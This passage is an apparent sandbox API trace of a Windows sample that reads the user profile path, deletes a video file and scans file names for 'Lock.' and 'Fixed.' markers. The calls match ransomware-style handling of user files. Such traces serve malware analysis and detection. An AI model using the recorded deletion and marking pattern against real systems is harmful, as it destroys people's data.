lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.848] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0257.848] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.848] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5c) returned 0x240da88 [0257.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/7qrN.mkv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv", lpFilePart=0x8bedfc*="7qrN.mkv") returned 0x2d [0257.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0257.850] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7qrn.mkv")) returned 0x20 [0257.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7241f90, ftCreationTime.dwHighDateTime=0x1d4d409, ftLastAccessTime.dwLowDateTime=0xe8cee1d0, ftLastAccessTime.dwHighDateTime=0x1d4cf2c, ftLastWriteTime.dwLowDateTime=0xe8cee1d0, ftLastWriteTime.dwHighDateTime=0x1d4cf2c, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0x17e2, dwReserved1=0x4, cFileName="7qrN.mkv", cAlternateFileName="")) returned 0xaa5920 [0257.850] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7qrn.mkv")) returned 1 [0257.852] FindNextFileW (in: hFindFile=0xaa5920, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7241f90, ftCreationTime.dwHighDateTime=0x1d4d409, ftLastAccessTime.dwLowDateTime=0xe8cee1d0, ftLastAccessTime.dwHighDateTime=0x1d4cf2c, ftLastWriteTime.dwLowDateTime=0xe8cee1d0, ftLastWriteTime.dwHighDateTime=0x1d4cf2c, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0x17e2, dwReserved1=0x4, cFileName="7qrN.mkv", cAlternateFileName="")) returned 0 [0257.852] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0257.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.853] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0257.853] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0257.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.854] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5c) returned 0x240da88 [0257.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/7qrN.mkv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv", lpFilePart=0x8bf658*="7qrN.mkv") returned 0x2d [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0257.856] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7qrN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7qrn.mkv")) returned 0xffffffff [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.856] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0257.856] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.856] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afvn6kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fvn6kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vn6kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n6kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kbS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bS8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JsNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sNZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NZy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zy6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IRM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RM.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.858] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0257.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0257.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afvn6kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fvn6kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vn6kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n6kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kbS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bS8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8JsNZy6W_IRM.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JsNZy6W_IRM.mp4", 